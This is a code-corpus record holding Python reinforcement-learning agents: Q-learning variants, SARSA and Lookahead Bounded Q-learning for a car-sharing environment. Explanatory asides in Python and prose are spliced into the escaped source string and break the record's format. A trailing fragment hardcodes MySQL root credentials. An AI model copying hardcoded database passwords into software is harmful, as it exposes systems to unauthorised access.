'''\n a, b, c = to_plot.shape\n for i, ax in enumerate(self.axes):\n ax.clear()\n for j in range(b): \n ax.plot(to_plot[i][j], label=Labels[i][j])\n plt.setp(ax.get_xticklabels(), visible=True)\n ax.grid()\n ax.legend(loc='best') \n plt.setp(self.axes[2].get_xticklabels(), visible=True)\n self.fig.canvas.draw() # draw\n plt.pause(0.000000000000000001) \n \n\n \n def train(self, interactive_plot = False, verbose = False):\n ''' Trains the Q-learning agent'''\n start_time = timeit.default_timer()\n \n \n #interactive plot: initialise the graph and settings\n self.Q_list.append(np.copy(self.Q))\n if interactive_plot:\n self.initialize_plot('Standard Q-learning', 'Time steps','Action-value')\n Labels = np.array([['Q-learning['+str(self.sa1)+']'],\n ['Q-learning['+str(self.sa2)+']'],\n ['Q-learning['+str(self.sa3)+']']])\n \n # initialize state\n state = self.env.reset()\n state_idx = self.find_indices(state)\n for step in range(self.num_steps):\n \n # choose an action based on epsilon-greedy policy\n q_values = self.Q[state_idx, :]\n action, action_idx = self.epsilon_greedy_policy(q_values, state_idx)\n \n self.most_visited_sa.append((state_idx,action_idx))\n \n self.count[state_idx, action_idx] += 1 \n # execute action\n newState, reward, info = self.env.step(action)\n newState_idx = self.find_indices(newState)\n self.lr = self.lr_func(self.count[state_idx, action_idx]) \n # Q-Learning update\n self.Q[state_idx, action_idx] += self.lr *(reward + self.gamma* np.max(self.Q[newState_idx, :])\\\n - self.Q[state_idx, action_idx])\n if verbose: \n print('Step:',step, 'reward:',\"{:.2f}\".format(reward), \n 'epsilon:', \"{:.2f}\".format(self.epsilon),'action_id:', action_idx, 'state:', state_idx, ) \n state = newState\n state_idx = newState_idx\n \n if interactive_plot:\n #print new Action-values after every step\n self.SQLsa_1.append(self.Q[self.sa1])\n self.SQLsa_2.append(self.Q[self.sa2])\n self.SQLsa_3.append(self.Q[self.sa3]) \n self.Q_list.append(np.copy(self.Q))\n if step % 10000 == 0:\n to_plot =np.array([[self.SQLsa_1], [self.SQLsa_2], [self.SQLsa_3]])\n self.plot_on_running(to_plot, Labels, step)\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append(np.copy(self.Q))\n \n elapsed_time = timeit.default_timer() - start_time\n print('Time=',elapsed_time)\n return self.Q_list, 
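# --- illustrative aside (not part of the agent code): the polynomial rate
# 1/n**w used by lr_func, contrasted with the classical 1/n for w = 0.5 (the
# class default above); the slower decay keeps late updates from vanishing:
_w = 0.5
for _n in (1, 4, 100, 10000):
    print(_n, 1. / _n ** _w, 1. / _n)   # e.g. n=100 -> 0.1 vs 0.01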
elapsed_time\n\n##############################################################################\n \n# SARSA\n\n##############################################################################\n\nclass SARSA(Qlearning):\n \"\"\"\n SARSA algorithm.\n \"\"\"\n def __init__(self, ENV, SEED):\n super(SARSA, self).__init__(ENV, SEED)\n\n def train(self, verbose = False):\n start_time = timeit.default_timer()\n self.Q_list.append(np.copy(self.Q))\n\n # initialize state and choose the first action on-policy\n state = self.env.reset()\n state_idx = self.find_indices(state)\n action, action_idx = self.epsilon_greedy_policy(self.Q[state_idx, :], state_idx)\n\n for step in range(self.num_steps):\n\n self.count[state_idx, action_idx] += 1 \n # execute action\n newState, reward, info = self.env.step(action)\n newState_idx = self.find_indices(newState)\n # choose the next action on-policy; bootstrapping on this action\n # (rather than the greedy one) is what makes SARSA on-policy\n newAction, newAction_idx = self.epsilon_greedy_policy(self.Q[newState_idx, :], newState_idx)\n self.lr = self.lr_func(self.count[state_idx, action_idx]) \n # SARSA update\n self.Q[state_idx, action_idx] += self.lr *(reward + self.gamma* self.Q[newState_idx, newAction_idx]\\\n - self.Q[state_idx, action_idx])\n if verbose: \n print('Step:',step, 'reward:',\"{:.2f}\".format(reward), \n 'epsilon:', \"{:.2f}\".format(self.epsilon),'action_id:', action_idx, 'state:', state_idx, ) \n \n state, state_idx = newState, newState_idx\n action, action_idx = newAction, newAction_idx\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append(np.copy(self.Q))\n \n elapsed_time = timeit.default_timer() - start_time\n print(elapsed_time)\n return self.Q_list, elapsed_time\n \n##############################################################################\n \n# Speedy Q-Learning\n\n##############################################################################\n \nclass SpeedyQLearning(Qlearning):\n \"\"\"\n Speedy Q-Learning algorithm.\n \"Speedy Q-Learning\". Ghavamzadeh et. al.. 2011.\n \"\"\"\n def __init__(self, ENV, SEED,):\n super(SpeedyQLearning, self).__init__(ENV, SEED,)\n self.Q_old = np.copy(self.Q)\n \n def train(self, verbose= False):\n ''' Trains the Speedy Q-learning agent'''\n start_time = timeit.default_timer()\n\n self.Q_list.append(np.copy(self.Q))\n\n # initialize state\n state = self.env.reset()\n state_idx = self.find_indices(state)\n for step in range(self.num_steps):\n \n old_q = np.copy(self.Q)\n \n # choose an action based on epsilon-greedy policy\n q_values = self.Q[state_idx, :]\n action, action_idx = self.epsilon_greedy_policy(q_values,state_idx)\n self.count[state_idx, action_idx] += 1 \n # execute action\n next_state, reward, info = self.env.step(action)\n next_state_idx = self.find_indices(next_state)\n max_q_cur = np.max(self.Q[next_state_idx, :]) \n max_q_old = np.max(self.Q_old[next_state_idx, :]) \n \n target_cur = reward + self.gamma * max_q_cur\n target_old = reward + self.gamma * max_q_old\n \n# alpha = 1/ (self.count[state, action_idx] + 1)\n self.lr = self.lr_func(self.count[state_idx, action_idx]) \n alpha = self.lr \n q_cur = self.Q[state_idx, action_idx]\n \n self.Q[state_idx, action_idx] = q_cur + alpha * (target_old - q_cur) + (\n 1. 
- alpha) * (target_cur - target_old)\n\n self.Q_old = np.copy(old_q)\n \n if verbose: \n print('Step:',step, 'reward:',\"{:.2f}\".format(reward), \n 'epsilon:', \"{:.2f}\".format(self.epsilon),'action_id:', action_idx, 'state:', state_idx, ) \n \n state = next_state\n state_idx = next_state_idx\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append(np.copy(self.Q))\n \n elapsed_time = timeit.default_timer() - start_time\n print(elapsed_time)\n return self.Q_list, elapsed_time \n\n##############################################################################\n \n# Double Q-Learning\n\n############################################################################## \n \nclass DoubleQLearning(Qlearning):\n \"\"\"\n Double Q-Learning algorithm.\n \"Double Q-Learning\". Hasselt H. V.. 2010.\n \"\"\"\n def __init__(self, ENV, SEED):\n super(DoubleQLearning, self).__init__(ENV, SEED)\n self.Qprime = np.copy(self.Q)\n self.countprime = np.copy(self.count)\n\n \n def train(self, verbose=False):\n ''' Trains the Q-learning agent'''\n start_time = timeit.default_timer()\n\n self.Q_list.append(np.copy(self.Q))\n\n # initialize state\n state = self.env.reset()\n state_idx = self.find_indices(state)\n for step in range(self.num_steps):\n \n # choose an action based on epsilon-greedy policy\n q_values = (self.Q[state_idx, :] + self.Qprime[state_idx, :] )/2\n action, action_idx = self.epsilon_greedy_policy(q_values,state_idx)\n \n # execute action\n newState, reward, info = self.env.step(action)\n newState_idx = self.find_indices(newState) \n \n # Double Q-Learning update\n \n if np.random.uniform() < .5:\n self.count[state_idx, action_idx] += 1 \n self.lr = self.lr_func(self.count[state_idx, action_idx])\n self.Q[state_idx, action_idx] += self.lr *(reward + self.gamma* np.max(self.Qprime[newState_idx, :])\\\n - self.Q[state_idx, action_idx])\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append((np.copy(self.Q)+np.copy(self.Qprime))/2)\n \n else:\n self.countprime[state_idx, action_idx] += 1 \n self.lr = self.lr_func(self.countprime[state_idx, action_idx])\n self.Qprime[state_idx, action_idx] += self.lr *(reward + self.gamma* np.max(self.Q[newState_idx, :])\\\n - self.Qprime[state_idx, action_idx])\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append((np.copy(self.Qprime)+np.copy(self.Q))/2)\n \n if verbose: \n print('Step:',step, 'reward:',\"{:.2f}\".format(reward), \n 'epsilon:', \"{:.2f}\".format(self.epsilon),'action_id:', action_idx, 'state:', state_idx, ) \n\n state = newState\n state_idx = newState_idx\n elapsed_time = timeit.default_timer() - start_time\n print(elapsed_time)\n return self.Q_list, elapsed_time\n\n##############################################################################\n \n# Bias Corrected Q-leaning\n\n############################################################################## \n\nclass Bias_corrected_QL(Qlearning):\n '''Implementation of a Bias Corrected Q-leaning Agent '''\n \n def __init__(self, ENV, SEED, K = 20):\n super(Bias_corrected_QL, self).__init__(ENV, SEED)\n self.K = K\n self.BR = np.zeros((self.env.nS, self.env.nA))\n self.BT = np.zeros((self.env.nS, self.env.nA))\n self.Rvar = np.zeros((self.env.nS, self.env.nA)) \n self.Rmean = np.zeros((self.env.nS, self.env.nA)) \n self.n_actions = self.env.actions.shape[0] \n self.count = np.ones((self.env.nS, self.env.nA)) \n self.T = np.zeros((self.env.nS, self.env.nA, self.K)).astype(int) \n #self.n_eps = np.zeros(self.env.nS)\n \n \n def train(self, verbose = 
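# --- illustrative aside (not part of SpeedyQLearning): the update above is
# q <- q + a*(T_old - q) + (1 - a)*(T_cur - T_old), i.e. a full step toward the
# newer bootstrap target plus a vanishing correction toward the older one.
# Numeric check with made-up values:
_q, _t_old, _t_cur, _a = 1.0, 2.0, 3.0, 0.1
_q_new = _q + _a * (_t_old - _q) + (1. - _a) * (_t_cur - _t_old)
assert abs(_q_new - 2.0) < 1e-12
# algebraically identical grouping: (1-a)*(q + T_cur) + (2a - 1)*T_old
assert abs(_q_new - ((1 - _a) * (_q + _t_cur) + (2 * _a - 1) * _t_old)) < 1e-12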
False):\n start_time = timeit.default_timer()\n self.Q_list.append(np.copy(self.Q))\n # initialize state\n state = self.env.reset()\n state_idx = self.find_indices(state)\n for step in range(self.num_steps):\n # choose an action based on epsilon-greedy policy\n q_values = self.Q[state_idx, :] #+ self.U[state, :] - self.L[state,:] \n action, action_idx = self.epsilon_greedy_policy(q_values, state_idx)\n \n \n self.lr = self.lr_func(self.count[state_idx, action_idx]) #1000/(1000+step)\n # execute action\n newState, reward, info = self.env.step(action)\n newState_idx = self.find_indices(newState)\n self.T[state_idx,action_idx, :-1] = self.T[state_idx,action_idx, 1:]\n self.T[state_idx,action_idx, -1] = int(newState_idx)\n #self.memory.append((state, action_idx,reward))\n \n prevMean = self.Rmean[state_idx, action_idx]\n prevVar = self.Rvar[state_idx, action_idx]\n prevSigma = np.sqrt(prevVar/self.count[state_idx, action_idx])\n \n self.Rmean[state_idx, action_idx] = prevMean + (reward - prevMean)/self.count[state_idx, action_idx]\n self.Rvar[state_idx, action_idx] = (prevVar + (reward- prevMean)*(reward - self.Rmean[state_idx, action_idx]))/self.count[state_idx, action_idx]\n \n bM= np.sqrt(2*np.log(self.n_actions +7) - np.log(np.log(self.n_actions + 7)) - np.log(4*np.pi))\n self.BR[state_idx, action_idx]=(np.euler_gamma/bM + bM)*prevSigma\n self.BT[state_idx, action_idx]=self.gamma *(np.max(self.Q[newState_idx,:]) - np.mean(np.max(self.Q[self.T[state_idx,action_idx],:],axis=1)))\n delta = self.Rmean[state_idx, action_idx] + self.gamma * np.max(self.Q[newState_idx, :]) - self.Q[state_idx, action_idx]\n self.BR[state_idx, action_idx] = self.BR[state_idx, action_idx] if self.count[state_idx, action_idx] >=2 else 0.0\n self.BT[state_idx, action_idx] = self.BT[state_idx, action_idx] if self.count[state_idx, action_idx] >=self.K else 0.0\n \n self.Q[state_idx, action_idx] += self.lr * (delta -self.BR[state_idx, action_idx] - self.BT[state_idx, action_idx])\n\n \n self.count[state_idx, action_idx] += 1 \n state = newState\n state_idx = newState_idx\n if verbose: \n print('Step:',step, 'reward:',\"{:.2f}\".format(reward), \n 'epsilon:', \"{:.2f}\".format(self.epsilon),'action_id:', action_idx, 'state:', state_idx, ) \n \n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append(np.copy(self.Q))\n\n elapsed_time = timeit.default_timer() - start_time\n print(\"Time=\"+str(elapsed_time))\n return self.Q_list, elapsed_time \n\n##############################################################################\n \n# Lookahead Bounded Q-Learning\n\n############################################################################## \n\n \nclass Replay_Memory():\n\n def __init__(self, burn_in, memory_size=40, SEED=678, GAMMA= 0.95, K= 20 ):\n # The memory essentially stores transitions recorded from the agent\n \n self.memory = collections.deque(maxlen=memory_size)\n self.burn_in = burn_in\n self.prng_simulator = np.random.RandomState(SEED)\n random.seed(SEED)\n self.gamma = GAMMA\n self.K = K\n \n def ref_freq(self):\n# v=np.array(np.unique(self.memory, return_counts=True)).T.astype(float)\n v,i=np.unique(self.memory, return_counts=True, axis=0)\n# s=np.array(list(zip(v,i)))\n# s[:,1]= s[:,1]/len(self.memory)\n i=i/len(self.memory)\n return v,i\n \n \n def simulate_sample_path(self):\n '''TODO'''\n tau = self.prng_simulator.geometric(p=1-self.gamma, size=1)[0] \n #sample_path = random.sample(self.memory, tau) # no replacement\n sample_path = random.choices(self.memory, k=tau) # with replacement\n# 
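`Bias_corrected_QL` keeps running reward statistics (`Rmean`, `Rvar`) via incremental updates. A standard, numerically stable way to maintain such statistics is Welford's algorithm; note the class above stores its variance term slightly differently (it re-divides the accumulated quantity by the count each step), so this sketch is a reference point rather than a drop-in replacement:

```python
class RunningStats:
    """Welford's online mean/variance."""
    def __init__(self):
        self.n = 0
        self.mean = 0.0
        self.m2 = 0.0  # running sum of squared deviations

    def update(self, x):
        self.n += 1
        delta = x - self.mean
        self.mean += delta / self.n
        self.m2 += delta * (x - self.mean)

    @property
    def variance(self):
        # population variance of everything seen so far
        return self.m2 / self.n if self.n else 0.0

rs = RunningStats()
for reward in (1.0, 2.0, 4.0, 4.0):
    rs.update(reward)
print(rs.mean, rs.variance)  # 2.75 1.6875
```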
eps, dist = self.ref_freq()\n return np.array(sample_path)\n \n def sample(self):\n '''TODO'''\n sample = random.choices(self.memory, k=self.K) \n return np.array(sample)\n \n def append(self, transition):\n # Appends transition to the memory. \n self.memory.append(transition)\n \n def multi_append(self, *args):\n n = len(args)\n # Appends transition to the memory.\n for i in range(n):\n self.memory.append(args[i])\n\ndef bc(N,k):\n# return np.round(comb(N,k)).astype(int)\n return np.round(binom(N,k)).astype(int)\n\n\ndef get_idx(s):\n N = np.arange(1,s.shape[-1])\n ps = s[...,::-1].cumsum(-1)\n return (bc(ps[...,1:]+N,N) - bc(ps[...,:-1]+N,N)).sum(-1)\n \ndef reduce_cumulative(a, i, j, ufunc=np.add, axis=2):\n i = (a.shape[axis] + i) % a.shape[axis]\n j = (a.shape[axis] + j) % a.shape[axis]\n a = np.insert(a, 0, 0, axis)\n c = ufunc.accumulate(a, axis=axis)\n pre = np.ix_(*(range(x) for x in i.shape))\n l = len(i.shape) - axis\n return c[pre[l:] + (j,)] - c[pre[l:] + (i,)]\n\ndef sliced_reduce(a, i, j, ufunc=np.add, axis=2):\n indices = np.tile(\n np.repeat(\n np.arange(np.prod(a.shape[:axis])) * a.shape[axis],\n 2\n ),\n np.prod(i.shape[:len(i.shape) - axis])\n )\n indices[::2] += (a.shape[axis] + i.ravel()) % a.shape[axis]\n indices[1::2] += (a.shape[axis] + j.ravel()) % a.shape[axis]\n indices = indices.reshape(-1, 2)[::-1].ravel() # This seems to be counter-effective, please check for your own case.\n result = ufunc.reduceat(a.reshape(-1, *a.shape[axis+1:]), indices)[::2] # Select only even to odd.\n result[indices[::2] == indices[1::2]] = ufunc.reduce([])\n return result[::-1].reshape(*(i.shape + a.shape[axis+1:]))\n\ndef sliced_sum_numba(a, i, j, axis=2):\n i = (a.shape[axis] + i) % a.shape[axis]\n j = (a.shape[axis] + j) % a.shape[axis]\n m = np.prod(i.shape[:len(i.shape) - axis], dtype=int)\n n = np.prod(i.shape[len(i.shape) - axis:], dtype=int)\n a_flat = a.reshape(-1, *a.shape[axis:])\n i_flat = i.ravel()\n j_flat = j.ravel()\n result = np.empty((m*n,) + a.shape[axis+1:], dtype=a.dtype)\n numba_sum(a_flat, i_flat, j_flat, m, n, result)\n return result.reshape(*(i.shape + a.shape[axis+1:]))\n\n@numba.jit(parallel=True, nopython=True)\ndef numba_sum(a, i, j, m, n, out):\n for index in numba.prange(m*n):\n out[index] = np.sum(a[index % n, i[index]:j[index]], axis=0)\n\n\n@jit(nopython=True, cache=True)\ndef comp(sample_path_eps,sample_path_B,nS, nA, Qp, QG, QL, EmaxQ_array, \n mean_reward_array, next_states_indx):\n for t in range(len(sample_path_eps) - 1, -1, -1):\n for s_idx in range(nS):\n for a_idx in range(nA):\n ns_idx = next_states_indx[s_idx,a_idx, t]\n a_id = np.argmax(Qp[ns_idx, :])\n EmaxQa = EmaxQ_array[s_idx, a_idx] \n reward = mean_reward_array[s_idx, a_idx]\n a_QG_id = np.argmax(QG[t+1, ns_idx, :])\n \n QG[t, s_idx, a_idx] = reward + QG[t+1, ns_idx, a_QG_id ] + EmaxQa - Qp[ ns_idx, a_id] \n QL[t, s_idx, a_idx] = reward + QL[t+1, ns_idx, a_id ] + EmaxQa - Qp[ ns_idx, a_id] \n return QG, QL \n\ndef solve_inner_DP(sample_path_eps,sample_path_B,\n env, Q, EmaxQ_array, mean_reward_array,\n next_states_indx): \n '''\n Solves the deterministic perfect information relaxation problem via backward induction \n ''' \n nS = env.nS\n nA = env.nA\n tau = len(sample_path_eps) \n QG = np.zeros((tau + 1, nS, nA))\n QG[tau, :, :] = np.copy(Q)\n QL = np.zeros((tau + 1, nS, nA))\n QL[tau, :, :] = np.copy(Q)\n \n return comp(sample_path_eps,sample_path_B,nS, nA, Q, QG, QL, EmaxQ_array, \n mean_reward_array, next_states_indx)\n \nclass LBQL(Qlearning):\n '''Implementation of a LBQL Agent 
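`reduce_cumulative` above answers many slice-reductions `a[..., i:j]` in one pass by building a prefix accumulation and differencing its endpoints. The 1-D version of the trick, which the multi-axis code generalizes:

```python
import numpy as np

def range_sums(a, i, j):
    """Sum a[i[k]:j[k]] for many (i, j) pairs using one prefix sum."""
    c = np.concatenate(([0], np.cumsum(a)))  # c[m] == a[:m].sum()
    return c[j] - c[i]

a = np.array([3, 1, 4, 1, 5, 9])
i = np.array([0, 2, 1])
j = np.array([3, 5, 1])            # i == j gives an empty slice
print(range_sums(a, i, j))         # [ 8 10  0]
```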
'''\n \n def __init__(self, ENV, \n SEED,\n L_LR=0.01, \n U_LR=0.01,\n WITH_PENALTY=True,\n BURN_IN = 1000,\n USE_K = False,\n K = 20,\n memory_size=100000,\n M =200,\n relTol=0.01,\n USE_SCHEDULE = False\n ):\n super(LBQL, self).__init__(ENV, SEED,)\n self.L_lr = L_LR\n L_LR_SCHEDULE = np.ones(self.num_steps)\n L_LR_SCHEDULE[0:round(self.num_steps/2)] *= 0.1\n L_LR_SCHEDULE[round(self.num_steps/2):self.num_steps] *= 0.01\n self.L_lr_schedule = L_LR_SCHEDULE\n \n self.U_lr = U_LR\n U_LR_SCHEDULE = np.ones(self.num_steps)\n U_LR_SCHEDULE[0:round(self.num_steps/2)] *= 0.1\n U_LR_SCHEDULE[round(self.num_steps/2):self.num_steps] *= 0.01\n self.U_lr_schedule = U_LR_SCHEDULE\n\n self.L = np.ones((self.env.nS, self.env.nA)) * self.Lzero/(1-self.gamma)\n self.U = np.ones((self.env.nS, self.env.nA)) * self.Uzero/(1-self.gamma)\n\n self.USE_K = USE_K\n self.K = K\n self.M = M\n self.relTol = relTol\n self.with_penalty = WITH_PENALTY\n self.s_a_tuples = list(itertools.product(range(self.env.nS), range(self.env.nA)))\n self.burn_in = BURN_IN\n self.memory_eps = Replay_Memory(self.burn_in, memory_size= memory_size, SEED= SEED,\n GAMMA= self.gamma, K=self.K)\n self.memory_B = Replay_Memory(self.burn_in, memory_size= memory_size, SEED= SEED,\n GAMMA= self.gamma, K=self.K)\n ###### for plotting/monitoring L, Q and U\n self.Q_learning = np.copy(self.Q)\n self.Lsa_1 = []\n self.Qsa_1 = []\n self.Usa_1 = []\n self.QLsa_1 = []\n self.Lsa_2 = []\n self.Qsa_2 = []\n self.Usa_2 = [] \n self.QLsa_2 = []\n self.Lsa_3 = []\n self.Qsa_3 = []\n self.Usa_3 = [] \n self.QLsa_3 = []\n \n self.Q_list = []\n self.QL_list = []\n self.L_list = []\n self.U_list = []\n self.Rmean = np.zeros((self.env.nS, self.env.nA)) \n self.prevMean = np.zeros((self.env.nS, self.env.nA)) \n self.num_called_DP = 0\n \n self.USE_SCHEDULE = USE_SCHEDULE\n def solve_QG_QL_DP(self, sample_path_eps,sample_path_B):\n ''' Computes the upper & lower bounds on the Q-values by solving the PI \n and PI with nonanticipative policy problems, respectively via backward induction'''\n self.num_called_DP += 1\n tau = len(sample_path_eps) \n self.QG = np.zeros((tau + 1, self.env.nS, self.env.nA))\n self.QG[tau, :, :] = np.copy(self.Q)\n self.QL = np.zeros((tau + 1, self.env.nS, self.env.nA))\n self.QL[tau, :, :] = np.copy(self.Q)\n self.QD = np.zeros((tau + 1, self.env.nS, self.env.nA))\n self.backward_induction(sample_path_eps,sample_path_B)\n \n \n def f_r(self,sample_eps, sample_B):\n d_plus_eps = self.env.actions[:,None] + sample_eps\n w=np.minimum(self.env.states[:,None,None,:], d_plus_eps).astype(int)\n wij = reduce_cumulative(sample_B, np.zeros_like(w),w, np.add, axis=2)\n next_states = self.env.states[:,None,None,:] + np.sum(wij,axis=-2) - w\n next_states = next_states.astype(int)\n next_states_indx=get_idx(next_states)\n num_lost_sales = d_plus_eps - w\n dwij=np.multiply(self.env.stations.distance_ij, wij)\n lost_sales_cost = num_lost_sales@ self.env.stations.lost_sales_cost\n profit = np.sum(self.env.price[:,None,:,None] *dwij, axis=(3,4))\n reward = profit - lost_sales_cost\n mean_reward = np.mean(reward, axis=2)\n return next_states, next_states_indx, mean_reward \n \n \n def f_d(self,sample_eps, sample_B):\n d_plus_eps = self.env.actions[:,None] + sample_eps\n w=np.minimum(self.env.states[:,None,None,:], d_plus_eps).astype(int)\n wij = reduce_cumulative(sample_B, np.zeros_like(w),w, np.add, axis=2)\n next_states = self.env.states[:,None,None,:] + np.sum(wij,axis=-2) - w\n next_states = next_states.astype(int)\n 
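`LBQL.__init__` builds two-phase step-size schedules for the bound updates (0.1 for the first half of training, 0.01 afterwards). The same schedule, factored out as a small helper:

```python
import numpy as np

def two_phase_schedule(num_steps, first=0.1, second=0.01):
    """Piecewise-constant schedule like L_LR_SCHEDULE / U_LR_SCHEDULE above."""
    sched = np.full(num_steps, second, dtype=float)
    sched[: round(num_steps / 2)] = first
    return sched

print(two_phase_schedule(6))  # [0.1 0.1 0.1 0.01 0.01 0.01]
```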
next_states_indx=get_idx(next_states)\n return next_states, next_states_indx \n \n def Average_EmaxQa(self):#\n ''' Computes an estimated expected value using simulation ''' \n dim_s = self.sample_eps.shape[0]\n p = 1/dim_s*np.ones(dim_s)\n next_states, next_states_indx, mean_reward = self.f_r( self.sample_eps, self.sample_B)\n EmaxQa=np.dot(np.max(self.Q[next_states_indx, :],axis=3), p) #.reshape((self.env.nS,self.env.nA,dim_s))\n self.prevMean = self.Rmean\n self.Rmean = self.prevMean + (mean_reward - self.prevMean)/self.num_called_DP\n\n return self.gamma*EmaxQa, self.Rmean,next_states, next_states_indx \n \n \n def backward_induction(self, sample_path_eps,sample_path_B): \n '''\n Solves the deterministic perfect information relaxation problem via backward induction \n ''' \n if self.USE_K == False:\n EmaxQ_array, mean_reward_array,next_states, next_states_indx = self.Average_EmaxQa()\n else:\n EmaxQ_array, mean_reward_array,next_states, next_states_idx = self.Average_EmaxQa()\n next_states, next_states_indx = self.f_d(sample_path_eps, sample_path_B)\n self.QG, self.QL = solve_inner_DP(sample_path_eps,sample_path_B, \n self.env, self.Q, EmaxQ_array, \n mean_reward_array,\n next_states_indx)\n \n \n \n def train(self, interactive_plot = False, verbose = True):\n ''' Trains the Q-learning with IR agent'''\n \n start_time = timeit.default_timer()\n \n if interactive_plot:\n #interactive plot: initialise the graph and settings\n Title = 'Q-learning with penalty' if self.with_penalty else 'Q-learning no penalty'\n self.initialize_plot(Title, 'Time steps','Action-value')\n Labels = np.array([['L['+str(self.sa1)+']', 'Q['+str(self.sa1)+']','U['+str(self.sa1)+']','Q-learning['+str(self.sa1)+']'],\n ['L['+str(self.sa2)+']', 'Q['+str(self.sa2)+']','U['+str(self.sa2)+']','Q-learning['+str(self.sa2)+']'],\n ['L['+str(self.sa3)+']', 'Q['+str(self.sa3)+']','U['+str(self.sa3)+']','Q-learning['+str(self.sa3)+']']])\n \n self.L_list.append(np.copy(self.L))\n self.U_list.append(np.copy(self.U))\n self.Q_list.append(np.copy(self.Q)) \n \n self.QL_list.append(np.copy(self.Q_learning))\n # initialize state\n state = self.env.reset()\n state_idx = self.find_indices(state)\n \n for step in range(self.num_steps):\n\n if self.USE_SCHEDULE:\n self.U_lr= self.U_lr_schedule[step]\n self.L_lr= self.L_lr_schedule[step]\n\n # choose an action based on epsilon-greedy policy\n q_values = self.Q[state_idx, :] \n action, action_idx = self.epsilon_greedy_policy(q_values, state_idx)\n \n self.most_visited_sa.append((state_idx,action_idx))\n \n self.count[state_idx, action_idx] += 1\n \n self.lr = self.lr_func(self.count[state_idx, action_idx]) \n \n # execute action\n newState, reward, info = self.env.step(action)\n newState_idx = self.find_indices(newState)\n \n self.memory_eps.append(info['noise']['epsilons'])\n self.memory_B.append(info['noise']['B'])\n # Q-Learning update\n self.Q[state_idx, action_idx] += self.lr *(reward + self.gamma* np.max(self.Q[newState_idx, :]) -\\\n self.Q[state_idx, action_idx])\n if interactive_plot:\n # Standard Q-Learning following same behavioral policy\n self.Q_learning[state_idx, action_idx] += self.lr *(reward + self.gamma* np.max(self.Q_learning[newState_idx, :]) -\\\n self.Q_learning[state_idx, action_idx])\n cond = (step % self.M ==0 and step >= self.burn_in) and \\\n (not np.isclose(self.L[state_idx, action_idx],self.U[state_idx, action_idx],self.relTol) or \\\n not self.L[state_idx, action_idx]<=self.Q[state_idx, action_idx] <=self.U[state_idx, action_idx])\n if cond:# \n \n 
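Further down, the convergence test in `cond` calls `np.isclose(L, U, self.relTol)`; the third positional argument of `np.isclose` is `rtol`, so `relTol` is being used as a *relative* tolerance, which appears intended but is easy to misread. Spelled out with keywords:

```python
import numpy as np

L, U, relTol = 4.98, 5.0, 0.01
# np.isclose checks |L - U| <= atol + rtol * |U|
print(np.isclose(L, U, rtol=relTol, atol=0.0))  # True: 0.02 <= 0.05
```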
sample_path_eps = self.memory_eps.simulate_sample_path()\n sample_path_B = self.memory_B.simulate_sample_path()\n assert len(sample_path_eps)==len(sample_path_B)\n if self.USE_K:\n self.sample_eps = self.memory_eps.sample()\n self.sample_B = self.memory_B.sample()\n else:\n self.sample_eps = sample_path_eps\n self.sample_B = sample_path_B\n \n time =timeit.default_timer()\n self.solve_QG_QL_DP(sample_path_eps, sample_path_B) \n if self.with_penalty: \n self.U += self.U_lr * (self.QG[0,:, :] - self.U)\n \n else:\n self.U += self.U_lr * (self.QD[0,:, :] - self.U)\n \n self.L += self.L_lr * (self.QL[0,:, :] - self.L)\n\n self.Q[state_idx, action_idx] = np.maximum(np.minimum(self.U[state_idx, action_idx],\\\n self.Q[state_idx, action_idx]),self.L[state_idx, action_idx])\n \n state = newState\n state_idx = newState_idx\n \n if interactive_plot:\n #print new Action-values after every 10000 step \n self.Lsa_1.append(self.L[self.sa1])\n self.Qsa_1.append(self.Q[self.sa1])\n self.Usa_1.append(self.U[self.sa1]) \n self.QLsa_1.append(self.Q_learning[self.sa1])\n self.Lsa_2.append(self.L[self.sa2])\n self.Qsa_2.append(self.Q[self.sa2])\n self.Usa_2.append(self.U[self.sa2]) \n self.QLsa_2.append(self.Q_learning[self.sa2])\n self.Lsa_3.append(self.L[self.sa3])\n self.Qsa_3.append(self.Q[self.sa3])\n self.Usa_3.append(self.U[self.sa3]) \n self.QLsa_3.append(self.Q_learning[self.sa3])\n \n \n # self.L_list.append(np.copy(self.L))\n # self.U_list.append(np.copy(self.U))\n \n if step % 10000 == 0:\n to_plot =np.array([[self.Lsa_1, self.Qsa_1, self.Usa_1, self.QLsa_1],\n [self.Lsa_2, self.Qsa_2, self.Usa_2, self.QLsa_2],\n [self.Lsa_3, self.Qsa_3, self.Usa_3, self.QLsa_3]])\n self.plot_on_running(to_plot, Labels, step)\n if (step % self.num_to_save_Q ) == 0 and (step>0):\n self.Q_list.append(np.copy(self.Q))\n # self.QL_list.append(np.copy(self.Q_learning))\n\n elapsed_time = timeit.default_timer() - start_time\n print(\"Time=\"+str(elapsed_time))\n print(elapsed_time)\n return self.Q_list, self.QL_list, elapsed_time \nif __name__=='__main__':\n env = CarSharN() \n env.reset()\n agent = LBQL(env,1)\n q, ql,et =agent.train(interactive_plot= True)\n from collections import Counter\n Output = Counter(agent.most_visited_sa)\n Output.most_common(50)\n from matplotlib import rcParams\n import seaborn as sns\n\n############################################################################## \n sns.set(style=\"darkgrid\")\n sns.set(font_scale=1.75)\n\n fig, ax = plt.subplots(1,1)\n length= len(agent.Lsa_2)\n #lbl=np.arange(0,length/1000,1).astype(int)\n lbl=[0,0,200,400]#np.arange(0,20000/1000+1,5)\n plt.plot(agent.Lsa_2, label='LBQL-L', lw=2, alpha=0.8)\n plt.plot(agent.Qsa_2, label='LBQL-Q\\'', lw=5, alpha=0.8)\n plt.plot(agent.Usa_2, label='LBQL-U',lw=2, alpha=0.8)\n plt.plot(agent.QLsa_2,color='k', label='QL-Q',lw=2, linestyle='-', alpha=0.8)\n plt.legend(loc='best', fontsize=15)#13.3)\n# plt.tight_layout()\n plt.xlabel('Number of steps x 1000')\n plt.ylabel('Action-value')\n ax.set_xticklabels(lbl)","sub_path":"src/4-CS/agents_N.py","file_name":"agents_N.py","file_ext":"py","file_size_in_byte":37451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"395363008","text":"#!usr/bin/Python\nimport sys\nimport MySQLdb\nfrom nums import get_id\nimport json\n\nconn = MySQLdb.connect('localhost', 'root', 'shortfuse', 'm_leads')\ncursor = 